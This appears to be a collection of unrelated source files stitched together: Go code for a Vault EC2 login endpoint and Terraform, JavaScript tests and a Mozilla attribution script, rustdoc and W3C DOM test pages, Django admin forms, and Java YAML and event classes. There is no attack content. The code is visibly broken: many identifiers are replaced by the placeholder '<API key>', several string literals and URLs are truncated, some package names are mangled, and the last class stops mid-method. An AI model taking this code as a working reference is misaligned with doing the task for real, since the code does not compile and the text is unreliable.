        req.Auth.TTL = roleEntry.Period
        return &logical.Response{Auth: req.Auth}, nil
    } else {
        // Cap the TTL value.
        shortestTTL := b.System().DefaultLeaseTTL()
        if roleEntry.TTL > time.Duration(0) && roleEntry.TTL < shortestTTL {
            shortestTTL = roleEntry.TTL
        }
        if shortestMaxTTL < shortestTTL {
            shortestTTL = shortestMaxTTL
        }
        return framework.LeaseExtend(shortestTTL, shortestMaxTTL, b.System())(req, data)
    }
}
// identityDocument represents the items of interest from the EC2 instance
// identity document.
type identityDocument struct {
    Tags map[string]interface{} `json:"tags,omitempty" structs:"tags" mapstructure:"tags"`

    // InstanceID of the EC2 instance the document describes.
    InstanceID string `json:"instanceId,omitempty" structs:"instanceId" mapstructure:"instanceId"`

    // AmiID maps from the document's "imageId" field.
    AmiID string `json:"imageId,omitempty" structs:"imageId" mapstructure:"imageId"`

    AccountID string `json:"accountId,omitempty" structs:"accountId" mapstructure:"accountId"`
    Region    string `json:"region,omitempty" structs:"region" mapstructure:"region"`

    // PendingTime is kept as a string; it is compared against stored
    // whitelist entries during reauthentication.
    PendingTime string `json:"pendingTime,omitempty" structs:"pendingTime" mapstructure:"pendingTime"`
}
// <API key> represents the return values required after the process
// of verifying a role tag login: the policies to grant, the max TTL cap
// carried by the tag, and whether reauthentication is disallowed.
type <API key> struct {
    Policies []string      `json:"policies" structs:"policies" mapstructure:"policies"`
    MaxTTL   time.Duration `json:"max_ttl" structs:"max_ttl" mapstructure:"max_ttl"`
    <API key> bool `json:"<API key>" structs:"<API key>" mapstructure:"<API key>"`
}
// pathLoginSyn is the one-line help synopsis for the login endpoint.
const pathLoginSyn = `
Authenticates an EC2 instance with Vault.
`

// pathLoginDesc is the detailed help text for the login endpoint.
const pathLoginDesc = `
An EC2 instance is authenticated using the PKCS#7 signature of the instance identity
document and a client created nonce. This nonce should be unique and should be used by
the instance for all future logins, unless '<API key>' option on the
registered role is enabled, in which case client nonce is optional.
First login attempt, creates a whitelist entry in Vault associating the instance to the nonce
provided. All future logins will succeed only if the client nonce matches the nonce in the
whitelisted entry.
By default, a cron task will periodically look for expired entries in the whitelist
and deletes them. The duration to periodically run this, is one hour by default.
However, this can be configured using the 'config/tidy/identities' endpoint. This tidy
action can be triggered via the API as well, using the 'tidy/identities' endpoint.
`
<html>
<head>
<title>Not Found</title>
<style>
body {
padding: 50px;
font: 14px Helvetica, Arial;
}
</style>
</head>
<body>
<h1>Sorry! Can't find that.</h1>
<p>The page you requested cannot be found.</p>
</body>
</html> |
'use strict';

// Unit tests for the base relier model: verifies which query parameters are
// imported on fetch() and the default predicate implementations.
define([
  'chai',
  'lib/constants',
  'models/reliers/relier',
  '../../../mocks/window',
  '../../../lib/helpers'
], function (chai, Constants, Relier, WindowMock, TestHelpers) {
  var assert = chai.assert;

  describe('models/reliers/relier', function () {
    var relier;
    var windowMock;

    // Fixture values shared across the tests below.
    var SERVICE = 'service';
    var SYNC_SERVICE = 'sync';
    var PREVERIFY_TOKEN = 'abigtoken';
    var EMAIL = 'email';
    var UID = 'uid';

    beforeEach(function () {
      // Each test gets a fresh relier backed by a mocked window, so
      // location.search can be set per test.
      windowMock = new WindowMock();
      relier = new Relier({
        window: windowMock
      });
    });

    describe('fetch', function () {
      it('populates expected fields from the search parameters, unexpected search parameters are ignored', function () {
        windowMock.location.search = TestHelpers.toSearchString({
          preVerifyToken: PREVERIFY_TOKEN,
          service: SERVICE,
          email: EMAIL,
          uid: UID,
          ignored: 'ignored'
        });

        return relier.fetch()
          .then(function () {
            assert.equal(relier.get('preVerifyToken'), PREVERIFY_TOKEN);
            assert.equal(relier.get('service'), SERVICE);
            assert.equal(relier.get('email'), EMAIL);
            assert.equal(relier.get('uid'), UID);
            // unknown params must not leak onto the model
            assert.isFalse(relier.has('ignored'));
          });
      });
    });

    describe('isOAuth', function () {
      it('returns `false`', function () {
        assert.isFalse(relier.isOAuth());
      });
    });

    describe('isFxDesktop', function () {
      it('returns `false`', function () {
        assert.isFalse(relier.isFxDesktop());
      });
    });

    describe('getResumeToken', function () {
      it('returns null', function () {
        assert.isNull(relier.getResumeToken());
      });
    });

    describe('isSync', function () {
      it('returns true if `service=sync`', function () {
        windowMock.location.search = TestHelpers.toSearchString({
          service: SYNC_SERVICE
        });

        return relier.fetch()
          .then(function () {
            assert.isTrue(relier.isSync());
          });
      });

      it('returns false otw', function () {
        windowMock.location.search = TestHelpers.toSearchString({
          service: SERVICE
        });

        return relier.fetch()
          .then(function () {
            assert.isFalse(relier.isSync());
          });
      });
    });

    describe('<API key>', function () {
      it('returns `true` if `email` not set', function () {
        return relier.fetch()
          .then(function () {
            assert.isTrue(relier.<API key>());
          });
      });

      it('returns `true` if `email` is set to an email address', function () {
        windowMock.location.search = TestHelpers.toSearchString({
          email: 'testuser@testuser.com'
        });

        return relier.fetch()
          .then(function () {
            assert.isTrue(relier.<API key>());
          });
      });

      it('returns `false` if `email` is set to `blank`', function () {
        windowMock.location.search = TestHelpers.toSearchString({
          email: Constants.<API key>
        });

        return relier.fetch()
          .then(function () {
            assert.isFalse(relier.<API key>());
            // the email should not be set on the relier model
            assert.isFalse(relier.has('email'));
          });
      });
    });
  });
});
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `S0` fn in crate `encoding`.">
<meta name="keywords" content="rust, rustlang, rust-lang, S0">
<title>encoding::codec::japanese::eucjp::transient::S0 - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../../../rustdoc.css">
<link rel="stylesheet" type="text/css" href="../../../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
<![endif]-->
<nav class="sidebar">
<p class='location'><a href='../../../../index.html'>encoding</a>::<wbr><a href='../../../index.html'>codec</a>::<wbr><a href='../../index.html'>japanese</a>::<wbr><a href='../index.html'>eucjp</a>::<wbr><a href='index.html'>transient</a></p><script>window.sidebarCurrent = {name: 'S0', ty: 'fn', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</nav>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content fn">
<h1 class='fqn'><span class='in-band'>Function <a href='../../../../index.html'>encoding</a>::<wbr><a href='../../../index.html'>codec</a>::<wbr><a href='../../index.html'>japanese</a>::<wbr><a href='../index.html'>eucjp</a>::<wbr><a href='index.html'>transient</a>::<wbr><a class='fn' href=''>S0</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-1051' class='srclink' href='../../../../../src/encoding/util.rs.html#209-211' title='goto source code'>[src]</a></span></h1>
<pre class='rust fn'>pub fn S0<T>(_: &mut <a class='type' href='../../../../../encoding/codec/japanese/eucjp/internal/type.Context.html' title='encoding::codec::japanese::eucjp::internal::Context'>Context</a><T>) -> <a class='enum' href='../../../../../encoding/codec/japanese/eucjp/enum.State.html' title='encoding::codec::japanese::eucjp::State'>State</a></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<aside id="help" class="hidden">
<div>
<h1 class="hidden">Help</h1>
<div class="shortcuts">
<h2>Keyboard Shortcuts</h2>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
<dt>+</dt>
<dd>Collapse/expand all sections</dd>
</dl>
</div>
<div class="infos">
<h2>Search Tricks</h2>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code> or <code>* -> vec</code>)
</p>
</div>
</div>
</aside>
<script>
window.rootPath = "../../../../../";
window.currentCrate = "encoding";
window.playgroundUrl = "";
</script>
<script src="../../../../../jquery.js"></script>
<script src="../../../../../main.js"></script>
<script defer src="../../../../../search-index.js"></script>
</body>
</html> |
# -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
from django import forms
from django.forms.models import <API key>, BaseInlineFormSet
from django.forms.utils import ErrorList
from django.utils.translation import ugettext_lazy as _
from ckeditor.widgets import CKEditorWidget
from tinymce.widgets import TinyMCE
from utils import widgets
from identificacao.models import Identificacao
from memorando.models import MemorandoFAPESP, MemorandoResposta, Pergunta,\
MemorandoSimples, Corpo, MemorandoPinpoint
class <API key>(forms.ModelForm):
    """Admin form for MemorandoResposta.

    Renders the introduction/conclusion as TinyMCE rich text and narrows the
    'identificacao' choices with a select_related query to avoid per-row
    database hits when building the labels.
    """

    introducao = forms.CharField(required=False, label=u'Introdução',
                                 widget=TinyMCE(attrs={'cols': 160, 'rows': 180}, mce_attrs={'height': 500}))
    conclusao = forms.CharField(required=False, label=u'Conclusão',
                                widget=TinyMCE(attrs={'cols': 160, 'rows': 180}, mce_attrs={'height': 500}))
    # onchange JS hook lets the admin page react to the selected memorando.
    memorando = forms.ModelChoiceField(MemorandoFAPESP.objects.all(), label=u'Memorando FAPESP',
                                       widget=forms.Select(attrs={'onchange': '<API key>(this.value);'}))

    def __init__(self, *args, **kwargs):
        super(<API key>, self).__init__(*args, **kwargs)
        # NOTE(review): the string literal on the next line appears truncated
        # in this copy (likely an empty-choice label such as '---------' plus
        # a line continuation); confirm against version control.
        self.fields['identificacao'].choices = [('', '
        [(p.id, p.__unicode__()) for p in Identificacao.objects.all()
         .select_related('endereco__entidade', 'contato')]

    class Meta:
        model = MemorandoResposta
        fields = ['memorando', 'assunto', 'identificacao', 'estado', 'introducao', 'conclusao', 'assinatura', 'data',
                  'arquivo', 'protocolo', 'anexa_relatorio', 'obs']
class PerguntaAdminForm(forms.ModelForm):
    """Admin form for a Pergunta (question), with a rich-text question field."""

    questao = forms.CharField(label=u'Questão',
                              widget=TinyMCE(attrs={'cols': 100, 'rows': 30}, mce_attrs={'height': 120}))

    class Meta:
        model = Pergunta
        fields = ['numero', 'questao']
class <API key>(forms.ModelForm):
    """Admin form for MemorandoSimples with a CKEditor-backed body field."""

    # corpo = forms.CharField(widget=TinyMCE(attrs={'cols': 160, 'rows': 180}, mce_attrs={'height':500}))
    corpo = forms.CharField(widget=CKEditorWidget())

    def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
                 initial=None, error_class=ErrorList, label_suffix=':',
                 empty_permitted=False, instance=None):
        super(<API key>, self).__init__(data, files, auto_id, prefix, initial,
                                       error_class, label_suffix, empty_permitted, instance)
        # NOTE(review): the string literal on the next line appears truncated
        # in this copy (likely an empty-choice label plus a line
        # continuation); confirm against version control.
        self.fields['pai'].choices = [('', '
        [(p.id, p.__unicode__())
         for p in MemorandoSimples.objects.all().select_related('assunto')]

    class Meta:
        model = MemorandoSimples
        fields = ['superior', 'inferior', 'direita', 'esquerda', 'destinatario', 'assunto', 'corpo', 'equipamento',
                  'envio', 'assinatura', 'assinado', 'pai']
class <API key>(forms.ModelForm):
    """Admin form for MemorandoPinpoint with a CKEditor-backed body field."""

    corpo = forms.CharField(widget=CKEditorWidget())

    class Meta:
        model = MemorandoPinpoint
        fields = ['destinatario', 'assunto', 'corpo', 'envio', 'assinatura',
                  'assinado']
class CorpoAdminForm(forms.ModelForm):
    """Admin form for one question/answer body (Corpo) of a MemorandoResposta."""

    # MemorandoResposta - corpo de cada pergunta/resposta do memorando
    # (body of each question/answer of the memo)
    # The onchange JS hook refreshes the read-only question text below.
    pergunta = forms.ModelChoiceField(Pergunta.objects.all().select_related('memorando'),
                                      label=_(u'Pergunta'),
                                      widget=forms.Select(attrs={'onchange': '<API key>(this.id);'}))
    # Read-only mirror of the selected question's text.
    perg = forms.CharField(label='Texto da pergunta', widget=widgets.PlainTextWidget, required=False)
    resposta = forms.CharField(label='Resposta',
                               widget=TinyMCE(attrs={'cols': 50, 'rows': 30}, mce_attrs={'height': 120}))

    def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
                 initial=None, error_class=ErrorList, label_suffix=':',
                 empty_permitted=False, instance=None):
        super(CorpoAdminForm, self).__init__(data, files, auto_id, prefix, initial,
                                             error_class, label_suffix, empty_permitted, instance)
        # Pre-fill the plain-text question from either the POSTed selection
        # or the bound instance, so the admin shows the question being
        # answered next to the answer editor.
        if data:
            pergunta_id = data.get('pergunta')
            if pergunta_id:
                pgta = Pergunta.objects.select_related('memorando').get(id=pergunta_id)
                self.fields['perg'].initial = pgta.questao
        elif instance and hasattr(instance, 'pergunta'):
            self.fields['perg'].initial = instance.pergunta.questao

    class Meta:
        model = Corpo
        fields = ['pergunta', 'perg', 'resposta', 'anexo', 'concluido']

    class Media:
        js = ('js/selects.js', )
class <API key>(BaseInlineFormSet):
    """Inline formset base that scopes each form's question choices.

    MemorandoResposta - corpo de cada pergunta/resposta do memorando
    (body of each question/answer of the memo). The 'pergunta' queryset of
    every member form (and the empty form) is restricted to the questions of
    the memo selected in POST data or bound on the instance; with neither,
    no questions are offered.
    """

    def __init__(self, data=None, files=None, instance=None,
                 save_as_new=False, prefix=None, queryset=None):
        super(<API key>, self).__init__(data=data, files=files, instance=instance, save_as_new=save_as_new,
                                       prefix=prefix, queryset=queryset)
        if data:
            # Bound formset: scope questions to the memo chosen in the POST.
            memorando_id = data.get('memorando')
            if memorando_id:
                m = MemorandoFAPESP.objects.get(id=memorando_id)
                for f in self.forms:
                    f.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
                self.empty_form.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
        elif instance and hasattr(instance, 'memorando'):
            # Unbound but editing: scope to the instance's memo.
            m = instance.memorando
            for f in self.forms:
                f.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
            self.empty_form.fields['pergunta'].queryset = Pergunta.objects.select_related('memorando').filter(memorando=m)
        else:
            # No memo selected yet: offer no questions at all.
            for f in self.forms:
                f.fields['pergunta'].queryset = Pergunta.objects.none()
            self.empty_form.fields['pergunta'].queryset = Pergunta.objects.none()
# Inline formset binding Corpo rows to their MemorandoResposta, using the
# question-scoping base formset defined above.
CorpoFormSet = <API key>(MemorandoResposta, Corpo, formset=<API key>,
                         fields=['pergunta', 'resposta', 'anexo', 'concluido'])
package aws
import (
"testing"
"github.com/hashicorp/terraform/helper/resource"
)
// Acceptance test: creates an aws_elb via testAccAWSELBConfig, then imports
// it by resource address and verifies the imported state matches.
func <API key>(t *testing.T) {
    resourceName := "aws_elb.bar"

    resource.Test(t, resource.TestCase{
        PreCheck:     func() { testAccPreCheck(t) },
        Providers:    testAccProviders,
        CheckDestroy: <API key>,
        Steps: []resource.TestStep{
            // Step 1: create the ELB.
            {
                Config: testAccAWSELBConfig,
            },
            // Step 2: import it and verify the state round-trips.
            {
                ResourceName:      resourceName,
                ImportState:       true,
                ImportStateVerify: true,
            },
        },
    })
}
(function(Mozilla) {
    'use strict';

    // Helper that lets pages trigger Firefox stub attribution with custom
    // utm_* values while still honoring utm params already on the page URL.
    var <API key> = {};

    // Builds the attribution data object from `params`, merged with any utm
    // params already present in the page URL. Returns false when attribution
    // should be left untouched: an existing utm_content, AMO as the source,
    // or an incomplete `params` object.
    <API key>.<API key> = function(params) {
        // preserve any existing utm params.
        var current = new window._SearchParams().utmParams();

        // if utm_content exists or utm_source is from AMO then don't modify anything.
        if (current.utm_content || current.utm_source === 'addons.mozilla.org') {
            return false;
        }

        // if custom attribution data is not fully formed then return false.
        if (!Object.prototype.hasOwnProperty.call(params, 'utm_source') ||
            !Object.prototype.hasOwnProperty.call(params, 'utm_medium') ||
            !Object.prototype.hasOwnProperty.call(params, 'utm_campaign') ||
            !Object.prototype.hasOwnProperty.call(params, 'utm_content')) {
            return false;
        }

        return {
            /* eslint-disable camelcase */
            // existing page utm params win over the supplied custom values,
            // except utm_content which is always taken from params.
            utm_source: current.utm_source || params.utm_source,
            utm_medium: current.utm_medium || params.utm_medium,
            utm_campaign: current.utm_campaign || params.utm_campaign,
            utm_content: params.utm_content,
            referrer: document.referrer
            /* eslint-enable camelcase */
        };
    };

    // Entry point: authenticates custom attribution data when available,
    // otherwise falls back to the default stub attribution flow.
    <API key>.init = function(params, callback) {
        // Bail out quietly when the required globals are not loaded.
        if (typeof Mozilla.StubAttribution === 'undefined' || typeof window._SearchParams === 'undefined') {
            return;
        }

        // if we don't meet the usual requirements for stub attribution return false.
        if (!Mozilla.StubAttribution.meetsRequirements()) {
            return false;
        }

        // create our custom utm attribution data.
        var data = <API key>.<API key>(params);

        if (data) {
            // authenticate the custom data in the usual manner and let stub attribution do the rest.
            Mozilla.StubAttribution.<API key>(data);

            // fire a callback if supplied (e.g. to fire a GA event).
            if (typeof callback === 'function') {
                callback();
            }
        } else {
            Mozilla.StubAttribution.init();
        }
    };

    window.Mozilla.<API key> = <API key>;

})(window.Mozilla);
<!DOCTYPE HTML PUBLIC "-
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>http:
<link href="http:
<link rel="stylesheet" type="text/css" href="/tests/SimpleTest/test.css">
<script type="text/javascript" src="/MochiKit/packed.js"></script><script type="text/javascript" src="/tests/SimpleTest/SimpleTest.js"></script><script type="text/javascript" src="DOMTestCase.js"></script><script type="text/javascript" src="exclusions.js"></script><script type="text/javascript">
// expose test function names
function <API key>()
{
  return ['textsplittexttwo'];
}

// Count of loaded documents. Starts hugely negative so that an early
// loadComplete() increment can never reach 1 before setUpPage() resets
// this to 0.
var docsLoaded = -1000000;
var builder = null;
// This function is called by the testing framework before
// running the test suite.
// If there are no configuration exceptions, asynchronous
// document loading is started. Otherwise, the status
// is set to complete and the exception is immediately
// raised when entering the body of the test.
function setUpPage() {
setUpPageStatus = 'running';
try {
// creates test document builder, may throw exception
builder = <API key>();
docsLoaded = 0;
var docRef = null;
if (typeof(this.doc) != 'undefined') {
docRef = this.doc;
}
docsLoaded += preload(docRef, "doc", "staff");
if (docsLoaded == 1) {
setUpPage = 'complete';
}
} catch(ex) {
<API key>(builder, ex);
setUpPage = 'complete';
}
}
// This method is called on the completion of
// each asynchronous load started in setUpTests.
// When every synchronous loaded document has completed,
// the page status is changed which allows the
// body of the test to be executed.
function loadComplete() {
  if (++docsLoaded == 1) {
    setUpPageStatus = 'complete';
    runJSUnitTests();
    markTodos();
    SimpleTest.finish();
  }
}

// Identifier of this generated test; used to look up todo exclusions.
var docName = 'textsplittexttwo';
window.doc = window;

SimpleTest.<API key>();
addLoadEvent(setUpPage);
// Returns true when the given test failed, marking it as a known failure
// (todo) as a side effect; returns false for a passing test.
function testFails (test) {
  if (test.result) {
    return false;
  }
  test.todo = true;
  return true;
}
// If this document's tests are listed in todoTests, reclassify its
// failures as known failures (todo) after the run.
function markTodos() {
  if (todoTests[docName]) {
    // mark the failures as todos
    var failures = filter(testFails, SimpleTest._tests);
    // shouldn't be 0 failures
    // NOTE(review): both comparisons below rely on loose array-to-number
    // coercion; this appears intentional in the generated harness.
    todo(SimpleTest._tests != 0 && failures == 0, "test marked todo should fail somewhere");
  }
}
// Runs every exposed test function in order, reporting any thrown
// exception as a single harness failure.
function runJSUnitTests() {
  builder = <API key>();
  try {
    forEach(<API key>(),
      function (testName) {
        window[testName]();
      }
    );
  } catch (ex) {
    ok(false, "Test threw exception: " + ex);
  }
}
// Test body: loads the "staff" document, splits the text node of the third
// <name> element at offset 5, and asserts that the retained (leading) part
// of the original node equals "Roger".
function textsplittexttwo() {
  var success;
  if(checkInitialization(builder, "textsplittexttwo") != null) return;
  var doc;
  var elementList;
  var nameNode;
  var textNode;
  var splitNode;
  var value;

  var docRef = null;
  if (typeof(this.doc) != 'undefined') {
    docRef = this.doc;
  }
  doc = load(docRef, "doc", "staff");
  elementList = doc.<API key>("name");
  nameNode = elementList.item(2);
  textNode = nameNode.firstChild;
  // splitText(5) truncates textNode after 5 characters; the remainder
  // becomes the returned sibling node (splitNode).
  splitNode = textNode.splitText(5);
  value = textNode.nodeValue;
  assertEquals("<API key>","Roger",value);
}
</script>
</head>
<body>
<h2>Test http:
<p></p>
<p>
Copyright (c) 2001-2004 World Wide Web Consortium,
(Massachusetts Institute of Technology, European Research Consortium
for Informatics and Mathematics, Keio University). All
Rights Reserved. This work is distributed under the <a href="http:
hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
</p>
</body>
</html> |
package net.opengis.swe.v20;
/**
 * <p>
 * Tagging interface for all range components.
 * </p>
 *
 * <p>
 * Declares no methods of its own; it exists purely so range components can be
 * distinguished from other {@link SimpleComponent} implementations.
 * </p>
 *
 * @author Alex Robin
 * @since Nov 8, 2014
 */
public interface RangeComponent extends SimpleComponent
{
}
package minejava.event.player;
import minejava.Location;
import minejava.entity.Player;
import minejava.event.Cancellable;
import minejava.event.HandlerList;
public class PlayerMoveEvent extends PlayerEvent implements Cancellable{
private static final HandlerList handlers = new HandlerList();
private boolean cancel = false;
private Location from;
private Location to;
public PlayerMoveEvent(final Player player, final Location from, final Location to){
super(player);
this.from = from;
this.to = to;
}
@Override
public boolean isCancelled(){
return cancel;
}
@Override
public void setCancelled(boolean cancel){
this.cancel = cancel;
}
public Location getFrom(){
return from;
}
public void setFrom(Location from){
this.from = from;
}
public Location getTo(){
return to;
}
public void setTo(Location to){
this.to = to;
}
@Override
public HandlerList getHandlers(){
return handlers;
}
public static HandlerList getHandlerList(){
return handlers;
}
} |
package terraform
import (
"fmt"
"log"
"github.com/r3labs/terraform/dag"
)
// StateTransformer is a GraphTransformer that adds the elements of
// the state to the graph.
//
// This transform is used for example by the <API key> to ensure
// that only resources that are in the state are represented in the graph.
type StateTransformer struct {
    // Concrete, when non-nil, converts the abstract resource node into a
    // concrete node type before it is added to the graph.
    Concrete <API key>

    // State is the Terraform state whose resources become graph vertices.
    State *State
}
// Transform adds one vertex per resource found in the state. Each resource
// name is parsed into an address, tagged with its module path (minus the
// "root" element), optionally converted via the Concrete callback, and
// added to the graph.
func (t *StateTransformer) Transform(g *Graph) error {
    // If the state is nil or empty (nil is empty) then do nothing.
    if t.State.Empty() {
        return nil
    }

    // Go through all the modules in the diff.
    log.Printf("[TRACE] StateTransformer: starting")
    var nodes []dag.Vertex
    for _, ms := range t.State.Modules {
        log.Printf("[TRACE] StateTransformer: Module: %v", ms.Path)

        // Go through all the resources in this module.
        for name, rs := range ms.Resources {
            log.Printf("[TRACE] StateTransformer: Resource %q: %#v", name, rs)

            // Add the resource to the graph. A parse failure here means the
            // state contains a name this code itself wrote, so it is treated
            // as an internal bug rather than a user error.
            addr, err := <API key>(name)
            if err != nil {
                panic(fmt.Sprintf(
                    "Error parsing internal name, this is a bug: %q", name))
            }

            // Very important: add the module path for this resource to
            // the address. Remove "root" from it.
            addr.Path = ms.Path[1:]

            // Add the resource to the graph
            abstract := &<API key>{Addr: addr}
            var node dag.Vertex = abstract
            if f := t.Concrete; f != nil {
                node = f(abstract)
            }

            nodes = append(nodes, node)
        }
    }

    // Add all the nodes to the graph
    for _, n := range nodes {
        g.Add(n)
    }

    return nil
}
package minejava.yaml.representer;
import minejava.reg.io.<API key>;
import minejava.reg.math.BigInteger;
import minejava.reg.util.ArrayList;
import minejava.reg.util.Arrays;
import minejava.util.Calendar;
import minejava.reg.util.Date;
import minejava.reg.util.HashMap;
import minejava.reg.util.Iterator;
import minejava.reg.util.LinkedHashMap;
import minejava.reg.util.List;
import minejava.reg.util.Map;
import minejava.reg.util.Set;
import minejava.reg.util.TimeZone;
import minejava.reg.util.UUID;
import minejava.reg.util.regex.Pattern;
import minejava.yaml.error.YAMLException;
import minejava.yaml.external.biz.base64Coder.Base64Coder;
import minejava.yaml.nodes.Node;
import minejava.yaml.nodes.Tag;
import minejava.yaml.reader.StreamReader;
/**
 * Represents "safe" standard Java types (strings, booleans, numbers, dates,
 * collections, maps, arrays, enums, UUIDs, byte arrays) as YAML nodes.
 * Representing arbitrary JavaBeans is left to subclasses.
 */
class SafeRepresenter extends BaseRepresenter{
    // Explicit per-class tag overrides registered via addClassTag().
    protected Map<Class<? extends Object>, Tag> classTags;
    // Time zone used when dumping Date values; null means dump as UTC.
    protected TimeZone timeZone = null;

    public SafeRepresenter(){
        this.nullRepresenter = new RepresentNull();
        this.representers.put(String.class, new RepresentString());
        this.representers.put(Boolean.class, new RepresentBoolean());
        // Characters are emitted as single-character strings.
        this.representers.put(Character.class, new RepresentString());
        this.representers.put(UUID.class, new RepresentUuid());
        // byte[] gets a dedicated base64 !!binary representation...
        this.representers.put(byte[].class, new RepresentByteArray());
        // ...while the remaining primitive array types share one representer.
        Represent primitiveArray = new <API key>();
        representers.put(short[].class, primitiveArray);
        representers.put(int[].class, primitiveArray);
        representers.put(long[].class, primitiveArray);
        representers.put(float[].class, primitiveArray);
        representers.put(double[].class, primitiveArray);
        representers.put(char[].class, primitiveArray);
        representers.put(boolean[].class, primitiveArray);
        // Multi-representers match by instanceof rather than by exact class.
        this.multiRepresenters.put(Number.class, new RepresentNumber());
        this.multiRepresenters.put(List.class, new RepresentList());
        this.multiRepresenters.put(Map.class, new RepresentMap());
        this.multiRepresenters.put(Set.class, new RepresentSet());
        this.multiRepresenters.put(Iterator.class, new RepresentIterator());
        this.multiRepresenters.put(new Object[0].getClass(), new RepresentArray());
        this.multiRepresenters.put(Date.class, new RepresentDate());
        this.multiRepresenters.put(Enum.class, new RepresentEnum());
        // Calendar reuses the Date representer (it carries its own zone).
        this.multiRepresenters.put(Calendar.class, new RepresentDate());
        classTags = new HashMap<>();
    }

    /**
     * Returns the tag registered for the given class, or the supplied
     * default when no explicit tag has been added.
     */
    protected Tag getTag(Class<?> clazz, Tag defaultTag){
        if (classTags.containsKey(clazz)){
            return classTags.get(clazz);
        }else{
            return defaultTag;
        }
    }

    /**
     * Registers a tag to emit whenever instances of the given class are
     * represented.
     *
     * @return the tag previously associated with the class, or null
     */
    public Tag addClassTag(Class<? extends Object> clazz, Tag tag){
        if (tag == null){
            throw new <API key>("Tag must be provided.");
        }
        return classTags.put(clazz, tag);
    }

    // Represents null as the plain scalar "null".
    protected class RepresentNull implements Represent{
        @Override
        public Node representData(Object data){
            return representScalar(Tag.NULL, "null");
        }
    }

    // Matches every line-break character recognised by YAML.
    public static Pattern MULTILINE_PATTERN = Pattern.compile("\n|\u0085|\u2028|\u2029");

    protected class RepresentString implements Represent{
        @Override
        public Node representData(Object data){
            Tag tag = Tag.STR;
            Character style = null;
            String value = data.toString();
            // Strings containing non-printable characters cannot be dumped as
            // plain YAML scalars; fall back to base64-encoded !!binary.
            if (StreamReader.NON_PRINTABLE.matcher(value).find()){
                tag = Tag.BINARY;
                char[] binary;
                try{
                    binary = Base64Coder.encode(value.getBytes("UTF-8"));
                }catch (<API key> e){
                    throw new YAMLException(e);
                }
                value = String.valueOf(binary);
                style = '|';
            }
            // Prefer literal block style for multi-line content when the user
            // has not forced a default scalar style.
            if (defaultScalarStyle == null && MULTILINE_PATTERN.matcher(value).find()){
                style = '|';
            }
            return representScalar(tag, value, style);
        }
    }

    protected class RepresentBoolean implements Represent{
        @Override
        public Node representData(Object data){
            String value;
            if (Boolean.TRUE.equals(data)){
                value = "true";
            }else{
                value = "false";
            }
            return representScalar(Tag.BOOL, value);
        }
    }

    protected class RepresentNumber implements Represent{
        @Override
        public Node representData(Object data){
            Tag tag;
            String value;
            // Integral types map to !!int; everything else becomes !!float,
            // with the canonical YAML spellings for the IEEE special values.
            if (data instanceof Byte || data instanceof Short || data instanceof Integer || data instanceof Long || data instanceof BigInteger){
                tag = Tag.INT;
                value = data.toString();
            }else{
                Number number = (Number) data;
                tag = Tag.FLOAT;
                if (number.equals(Double.NaN)){
                    value = ".NaN";
                }else if (number.equals(Double.POSITIVE_INFINITY)){
                    value = ".inf";
                }else if (number.equals(Double.NEGATIVE_INFINITY)){
                    value = "-.inf";
                }else{
                    value = number.toString();
                }
            }
            return representScalar(getTag(data.getClass(), tag), value);
        }
    }

    protected class RepresentList implements Represent{
        @SuppressWarnings("unchecked")
        @Override
        public Node representData(Object data){
            return representSequence(getTag(data.getClass(), Tag.SEQ), (List<Object>) data, null);
        }
    }

    // Represents an Iterator by draining it as a sequence. Note the iterator
    // is consumed in the process.
    protected class RepresentIterator implements Represent{
        @SuppressWarnings("unchecked")
        @Override
        public Node representData(Object data){
            Iterator<Object> iter = (Iterator<Object>) data;
            return representSequence(getTag(data.getClass(), Tag.SEQ), new IteratorWrapper(iter), null);
        }
    }

    // Adapts a one-shot Iterator to the Iterable interface expected by
    // representSequence().
    private static class IteratorWrapper implements Iterable<Object>{
        private final Iterator<Object> iter;
        public IteratorWrapper(Iterator<Object> iter){
            this.iter = iter;
        }
        @Override
        public Iterator<Object> iterator(){
            return iter;
        }
    }

    protected class RepresentArray implements Represent{
        @Override
        public Node representData(Object data){
            Object[] array = (Object[]) data;
            List<Object> list = Arrays.asList(array);
            return representSequence(Tag.SEQ, list, null);
        }
    }

    // Represents arrays of primitives (except byte[]) as plain sequences by
    // boxing each element into the matching wrapper list.
    protected class <API key> implements Represent{
        @Override
        public Node representData(Object data){
            Class<?> type = data.getClass().getComponentType();
            if (byte.class == type){
